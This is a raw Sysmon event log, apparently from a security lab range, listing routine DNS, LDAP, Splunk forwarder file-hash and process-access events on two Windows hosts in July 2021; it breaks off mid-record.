354300x80000000000000001047340Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.980{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.14win-dc-890.attackrange.local61885- 354300x80000000000000001047339Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.979{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local58829- 354300x80000000000000001047338Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.978{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.14win-dc-890.attackrange.local54530- 354300x80000000000000001047337Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:48:06.977{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local58800- 354300x80000000000000001047336Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.976{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.14win-dc-890.attackrange.local63057- 354300x80000000000000001047335Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.976{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53579- 354300x80000000000000001047334Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.975{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.14win-dc-890.attackrange.local58889- 354300x80000000000000001047333Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.974{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local63131- 354300x80000000000000001047332Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.973{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.14win-dc-890.attackrange.local61760- 354300x80000000000000001047331Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.973{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT 
AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local55331- 23542300x8000000000000000806801Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:16.692{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF1AFE15EE1FB73B9965DEBCB266329F,SHA256=46E257099543434577653AC57F5B30EB3BA1755C8767F8D5B231C6DFB0CEDBEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047344Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:16.779{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3896C0499E677958B5CCCDEB29839A9F,SHA256=75E1ACE6C89CB250901DA9ECD63BC3FF1FCA3D9456126B5FF77A3AA7507E6571,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047343Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:07.918{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local50966-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001047342Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:07.917{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local50966-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 23542300x80000000000000001047345Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:48:17.794{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79C6DBC7519F20A244DAE18CD56F2408,SHA256=565D97CFB98A3D6EC9892E5FE6E91738A3484107D3BF09134F73AAAC5E673871,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806802Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:17.723{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5787C23B7E01100CC28719DE1712EFBD,SHA256=13DF838F048BE5A17C484E1F9F1AF74DA8C15975E8D50063258AEE35FBE55DEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806804Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:18.770{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=724866EB3284D82EF748056A8ED27309,SHA256=40C753316EAF2D5B064A0D0452C1DE3C6E9D5908D95EFD14932C43532D0855BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047347Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:18.808{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DECFA080905A158CCBC81EFC7114F0A1,SHA256=9EF3A9F0DA0E6271C57997796A5B09133AA2664ACE23E3E8E8348CDFC25B12A9,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001047346Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:18.225{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806803Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:17.309{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57212-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806805Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:19.770{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38EA1683B02C2947AA2BDADAD12D27FB,SHA256=FA5BABC3B345E40BE49933015D4CD12B16F6489D8C4589AA95D43DA08AC61E1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047356Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:19.823{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0EDA04630820D9876395D471EC67C078,SHA256=F59687CEBE86F3D01973BF86879D7057A9AC51F4C850FB450D23D6726B781908,IMPHASH=00000000000000000000000000000000falsetrue 
354300x80000000000000001047355Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:10.793{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50967-false10.0.1.12-8000- 10341000x80000000000000001047354Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:19.124{466BC892-32D3-60E8-770B-00000000CF01}63569744C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047353Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:19.124{466BC892-32D3-60E8-770B-00000000CF01}63569744C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001047352Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:19.124{466BC892-32D3-60E8-770B-00000000CF01}63569744C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047351Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:19.108{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047350Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:19.108{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047349Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:19.108{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047348Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:19.108{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000806807Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:20.801{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=019C2759F309C7889D8350A8E4DA618B,SHA256=1E318FD1585A4AF34A344352B90778B5D378618CD42296838398557E39A1D244,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001047357Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:20.839{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87410BF8276CBE5100955B1DBACC0E04,SHA256=BB85B74C2A83DC1B919D3952D29689B4F29F3E90840F15AABED136790BD20675,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806806Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:20.395{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047358Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:21.859{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44B3097C93B951DFC516D134AC44F31A,SHA256=722396C50DF61377DF06A618FF40F01A3BD943CC91D042918D63B1E7F4FAAE13,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806808Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:21.848{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9716349857DE28B92F7977A76464F35B,SHA256=5C6E9491037C0937953F53359B0286A1BAB4C90CCBBAE0EC99FCC4A9F33F4988,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047359Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:22.874{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D9F08B6D0F0AD4C3B9FFF240846744F,SHA256=336C6747043C909CEADAA45764FD5EAB4E357DA248D271F7CA3FD11A8E626998,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806810Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:22.864{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BD9F9196AFC35659193DF3CB8A31926,SHA256=969046DE2C79AE1C0D30655043D69959020A56BAE17130D7E84AD8E0FD7C0FCA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806809Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:20.527{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57213-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000806812Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:23.910{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D82CFA3BC15E8CDB8E7BFF8613C158FC,SHA256=08134B9CAF28EB8620479A1D4E56F071953B23ACC09F8735525847CD0A7C1D2F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047360Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:23.889{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7723D08F9FA944D2B164FF6447D9B7C2,SHA256=8B36C7F7FC6E133C4988B3DE0BB8817D91DF2F3E24D16C65104F0E6BD5BB0CCF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806811Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:22.355{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57214-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806840Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:24.926{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08321C6760320410A9E93A89752FE2F6,SHA256=E131187ADA0A027E4AEAD51E9D1D5027E46C91CE6E18995DAF0E561662C66DE3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806839Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:24.926{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F3C8-60EB-5879-00000000D001}3196C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806838Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:24.926{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806837Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:48:24.926{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806836Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:24.926{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806835Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:48:24.926{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806834Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:24.926{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\